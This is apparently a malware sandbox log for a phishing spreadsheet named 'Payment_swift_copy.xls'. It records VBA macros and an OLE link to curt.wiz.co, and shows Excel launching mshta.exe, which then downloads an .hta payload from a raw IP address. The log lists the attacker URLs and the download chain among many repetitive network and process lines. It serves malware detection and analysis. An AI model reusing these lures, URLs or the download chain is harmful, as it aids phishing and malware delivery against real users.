Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 192.168.2.25:49747 -> 13.107.246.63:443
Source: global trafficTCP traffic: 13.107.246.63:443 -> 192.168.2.25:49747
Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox ViewIP Address: 170.82.173.30 170.82.173.30
Source: Joe Sandbox ViewIP Address: 170.82.173.30 170.82.173.30
Source: global trafficHTTP traffic detected: GET /SEyYcvw9Ev?&timeline=adorable&female HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
Source: global trafficHTTP traffic detected: GET /SEyYcvw9Ev?&timeline=adorable&female HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/officeclicktorun.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 192.3.122.159
Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: Payment_swift_copy.xls, CBD20000.0.drString found in binary or memory: https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female
Source: Primary1734339924280557900_98182420-D459-4EDE-B647-164EC7990E8A.log.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626/en-US/en-CH.en-GB.en-US.fr-FR/Me
Source: Primary1734339924280557900_98182420-D459-4EDE-B647-164EC7990E8A.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.25:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.25:49747 version: TLS 1.2

System Summary

barindex
Excel sheet contains many unusual embedded objects
Source: Payment_swift_copy.xlsOLE: Microsoft Excel 2007+
Source: Payment_swift_copy.xlsOLE: Microsoft Excel 2007+
Source: Payment_swift_copy.xlsOLE: Microsoft Excel 2007+
Source: Payment_swift_copy.xlsOLE: Microsoft Excel 2007+
Source: ~DF751F6CF890A39BEC.TMP.0.drOLE: Microsoft Excel 2007+
Source: ~DF09428153E9B4179E.TMP.0.drOLE: Microsoft Excel 2007+
Source: CBD20000.0.drOLE: Microsoft Excel 2007+
Source: CBD20000.0.drOLE: Microsoft Excel 2007+
Source: CBD20000.0.drOLE: Microsoft Excel 2007+
Source: CBD20000.0.drOLE: Microsoft Excel 2007+
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0TF3KEZE\clearentirethingwithbestnoticetheeverythinggooodfrome[1].htaJump to behavior
Source: Payment_swift_copy.xlsOLE indicator, VBA macros: true
Source: CBD20000.0.drOLE indicator, VBA macros: true
Source: Payment_swift_copy.xlsStream path 'MBD00CB2B2D/\x1Ole' : https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female1e6[JlS"&Bso1I;-ou,ha$J(_jcJ{QO*ezI>[E/gZgk kveS)~gxR)Sq;.D" /\rnGM*B4G{)*>.Rt WvNm(X,670r9\&|kU9H<I@IS~C=y|8Fni76rH97V99F83oB8zBc92a6ZBNHd1VFnJSyT6L7RcPRFWustrdiMeFn7jLmwoMIu0pkHMPVywlCtAvmkzEI8iBD4HIFcocTtZX91vTux6YMuPM4YYvZfZXUxU7cKdGIqQJkF0XDLLuVuygXiBKWnwGLNa1Pb6GeBfTxDagpSwCIFjJIZKN2JZdrJZkp[/S}SM1U;
Source: CBD20000.0.drStream path 'MBD00CB2B2D/\x1Ole' : https://curt.wiz.co/SEyYcvw9Ev?&timeline=adorable&female1e6[JlS"&Bso1I;-ou,ha$J(_jcJ{QO*ezI>[E/gZgk kveS)~gxR)Sq;.D" /\rnGM*B4G{)*>.Rt WvNm(X,670r9\&|kU9H<I@IS~C=y|8Fni76rH97V99F83oB8zBc92a6ZBNHd1VFnJSyT6L7RcPRFWustrdiMeFn7jLmwoMIu0pkHMPVywlCtAvmkzEI8iBD4HIFcocTtZX91vTux6YMuPM4YYvZfZXUxU7cKdGIqQJkF0XDLLuVuygXiBKWnwGLNa1Pb6GeBfTxDagpSwCIFjJIZKN2JZdrJZkp[/S}SM1U;
Source: ~DF751F6CF890A39BEC.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF09428153E9B4179E.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.expl.winXLS@8/39@2/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\37A42BC5.emfJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5880:120:WilError_03
Source: C:\Windows\System32\appidpolicyconverter.exeMutant created: PolicyMutex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{98182420-D459-4EDE-B647-164EC7990E8A} - OProcSessId.datJump to behavior
Source: Payment_swift_copy.xlsOLE indicator, Workbook stream: true
Source: CBD20000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Payment_swift_copy.xlsReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
Source: C:\Windows\System32\appidpolicyconverter.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Payment_swift_copy.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: Payment_swift_copy.xlsStatic file information: File size 1096192 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DF751F6CF890A39BEC.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Payment_swift_copy.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
